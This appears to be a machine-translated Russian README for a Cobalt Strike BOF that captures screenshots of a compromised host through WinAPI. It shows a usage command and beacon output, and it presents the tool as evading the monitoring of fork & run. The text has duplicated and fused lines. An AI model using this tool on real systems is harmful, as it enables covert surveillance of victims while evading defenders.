
Альтернативная функция создания скриншотов для Cobalt Strike, использующая WinAPI и не выполняющая fork & run. Скриншот загружается в память.
Альтернативная возможность создания скриншотов для Cobalt Strike, использующая WinAPI и не выполняющая fork & run. Скриншот загружается в память.
make0: захват полного экрана (PID = 0) конкретный PID: захват конкретного PID (работает даже при свернутом окне!)
screenshot_bof без аргументов вызовет диалоговое окно GUIbeacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
Cobalt Strike использует технику, известную как fork & run, для многих своих возможностей пост-эксплуатации, включая команду screenshot. Хотя такое поведение обеспечивает стабильность, сейчас оно хорошо известно и активно мониторится. Этот BOF предназначен для предоставления более OPSEC-безопасной версии функции создания скриншотов.
обычный отказ от ответственности, я не несу ответственности за любые преступления против человечества, которые вы можете совершить, или ядерную войну, которую вы можете вызвать, используя этот плохо написанный код.